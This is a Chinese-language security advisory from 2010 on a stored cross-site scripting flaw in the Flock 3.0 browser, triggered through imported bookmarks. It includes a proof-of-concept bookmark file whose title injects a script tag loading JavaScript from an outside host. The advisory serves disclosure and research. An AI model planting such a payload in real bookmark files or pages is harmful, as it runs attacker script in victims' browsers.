安全研究
安全漏洞
Flock浏览器畸形书签脚本注入漏洞
发布日期:2010-08-19
更新日期:2010-08-20
受影响系统:Flock Flock 3.0.0.3989
描述:
BUGTRAQ ID:
42556
Flock是一款基于Firefox的浏览器,集成了RSS、Blog、书签、图片共享等下一代网络技术。
Flock中存在存储式跨站脚本漏洞。如果用户受骗从其他浏览器导入了恶意书签,或添加了新的书签,则用户从菜单查看收藏的网页时就会导致执行书签中所注入的恶意代码。
<*来源:Lostmon (
lostmon@gmail.com)
链接:
http://marc.info/?l=bugtraq&m=128223181302983&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<!DOCTYPE NETSCAPE-Bookmark-file-1>
<!-- This is an automatically generated file.
It will be read and overwritten.
DO NOT EDIT! -->
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8">
<TITLE>Bookmarks</TITLE>
<H1>Menú Marcadores</H1>
<DL><p>
<DT><A HREF="
http://www.mozilla.org" ADD_DATE="1282083605"
LAST_MODIFIED="1282083638">"><script
src='
http://vuln.xssed.net/thirdparty/scripts/ckers.org.js'></A>
</DL><p>
建议:
厂商补丁:
Flock
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.flock.com/浏览次数:2325
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障 |
